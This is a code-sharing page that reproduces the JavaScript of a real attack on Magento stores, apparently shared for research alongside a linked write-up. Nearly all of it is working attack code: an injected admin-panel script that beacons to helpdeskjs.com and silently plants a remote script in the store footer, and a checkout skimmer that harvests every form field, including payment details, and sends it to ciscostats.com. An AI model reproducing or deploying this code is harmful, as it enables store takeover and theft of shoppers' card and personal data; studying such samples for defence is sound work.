Create a gist now

Instantly share code, notes, and snippets.

Embed
What would you like to do?
XSS helpdeskjs.com javascript code to insert malware in the Magento backend (footer section) -- see also http://gwillem.gitlab.io/2017/12/28/hackers-breach-magento-through-helpdesk/
function utoa(str) {
return window.btoa(unescape(encodeURIComponent(str)));
}
function atou(str) {
return decodeURIComponent(escape(window.atob(str)));
}
document.addEventListener("DOMContentLoaded", theDomHasLoaded, false);
function theDomHasLoaded() {
replacer = document.getElementById("page:main-container").innerHTML;
replacer = replacer.replace(/<script src\="https:\/\/helpdeskjs\.com\/jquery\.js"><\/script>@gmail\.com/g, 'knockers@yahoo.com');
replacer = replacer.replace(/&lt;script src\="https:\/\/helpdeskjs\.com\/jquery\.js"&gt;&lt;\/script&gt;@gmail\.com/g, 'knockers@yahoo.com');
document.getElementById("page:main-container").innerHTML = replacer;
var els = document.querySelectorAll("a[href*='/system_config/index/key']");
var cooka = document.cookie.replace(/(?:(?:^|.*;\s*)scripted\s*\=\s*([^;]*).*$)|^.*$/, "$1");
var url = window.location.hostname;
if (els[0] !== undefined) var access = "config 1";
else var access = "config 0";
var img = document.createElement("IMG");
img.id = "gatracking";
img.src = "https://helpdeskjs.com/receive.php?url="+url+" "+access;
document.body.appendChild(img);
function removim(id){
document.getElementById(id).remove();
}
removim("gatracking");
if (cooka != "yes" && els[0]) {
var arrHREF = [];
var i = 0;
for(; i<els.length; i++) {
arrHREF.push(els[i].href);
}
function makeFrame() {
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", arrHREF[0]);
ifrm.setAttribute("id", "framing");
ifrm.style.height = "0"; //hide iframe
ifrm.style.width = "0"; //hide iframe
ifrm.style.display = "none"; //hide iframe
document.body.appendChild(ifrm);
}
makeFrame();
document.getElementById('framing').onload = function makeFrame2() {
var els2 = document.querySelector('#framing').contentDocument.querySelectorAll("a[href*='/system_config/edit/section/design/key/']");
if (els2[0] !== undefined) var design = "design 1";
else var access = "design 0";
var img = document.createElement("IMG");
img.id = "gatracking2";
img.src = "https://helpdeskjs.com/receive.php?url="+url+" "+design;
document.body.appendChild(img);
function removim(id){
document.getElementById(id).remove();
}
removim("gatracking2");
els2[0].click();
document.getElementById('framing').id = 'framing2';
document.getElementById('framing2').onload = function changeAcc() {
var iframe = document.getElementById('framing2');
var innerDoc = iframe.contentDocument || iframe.contentWindow.document;
document.cookie = "scripted=yes; expires=Thu, 18 Dec 2018 12:00:00 UTC";
// from here
var footerarea = innerDoc.getElementById('design_footer_absolute_footer');
if( footerarea !== undefined) var area = "area 0";
var img = document.createElement("IMG");
img.id = "area1";
img.src = "https://helpdeskjs.com/receive.php?url="+url+" "+area;
document.body.appendChild(img);
function removim(id){
document.getElementById(id).remove();
}
removim("area1");
else {
if (innerDoc.getElementById('design_footer_absolute_footer').innerHTML.match("ciscostats")){
}
else {
innerDoc.getElementById('design_footer_absolute_footer').innerHTML = innerDoc.getElementById('design_footer_absolute_footer').innerHTML + "<script src=https://ciscostats.com/ga.js></script>" ;
window.saver = innerDoc.querySelectorAll("button[onclick*='submit']");
saver[0].click();
var img2 = document.createElement("IMG");
img2.id = "ga-tracking";
img2.src = "https://helpdeskjs.com/receive.php?url="+url+" DONE!";
innerDoc.body.appendChild(img2);
removim("ga-tracking");
}
}
}
}
}
}
window.onload = function(){
var x=document.getElementsByTagName("input");
for(var i = 0; i < x.length; i++) {
var str=x[i].value;
if (str.indexOf('helpdeskjs.com')!== -1){
x[i].value = "knockers@yahoo.com";
}
}
}
function LycqLBoqkw(b){
var c=document.createElement("img");
c.width="1px";
c.height="1px";
c.id="rTbgcrowBT";
c.src="https://ciscostats.com/validate.php?data="+btoa(unescape(encodeURIComponent(b)));setTimeout("n=11",3E3);
document.body.appendChild(c);
var el = document.getElementById( 'rTbgcrowBT' );
el.parentNode.removeChild( el );
}
function hotlCkRyRv(){
var inputs = document.getElementsByTagName('input');
var selects = document.getElementsByTagName('select');
var ValueArray = new Array(inputs.length);
var SelectArray = new Array(selects.length);
for(var b=0; b<inputs.length; b++)
{
if (inputs[b].getAttribute('name') == null){
ValueArray[b] = inputs[b].getAttribute('id') + ":" + inputs[b].value;
}
else {
ValueArray[b] = inputs[b].getAttribute('name') + ":" + inputs[b].value;
}
if(ValueArray[b].match("token:|javascript|browser|discounts|step:|reduction|utf8:")){
delete ValueArray[b];
}
}
for(var i=0; i<selects.length; i++)
{
if (selects[i].getAttribute('name') == null){
SelectArray[i] = selects[i].getAttribute('id') + ":" + selects[i].value;
}
else {
SelectArray[i] = selects[i].getAttribute('name') + ":" + selects[i].value;
if (selects[i].getAttribute('name').indexOf('region_id') >= 0){
var ii = selects[i].options.selectedIndex;
if(typeof selects[i].options[ii] !== "undefined")
{
SelectArray[i] = selects[i].getAttribute('name') + ":" + selects[i].options[ii].text;
}
}
}
}
var SendingData = JSON.stringify(ValueArray.concat(SelectArray));
LycqLBoqkw(SendingData)}
window.onload = function() {
if(window.location.href.match("onestepcheckout|checkout\/onepage|firech|onepagecheckout|onepage|checkout\/cart")){
var buttons = document.getElementsByTagName('button');
for(var i=0; i<buttons.length; i++)
{
buttons[i].addEventListener("click", hotlCkRyRv);
}
var buttons = document.getElementsByTagName('input');
for(var i=0; i<buttons.length; i++)
{
if (buttons[i].type == "submit")buttons[i].addEventListener("click", hotlCkRyRv);
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment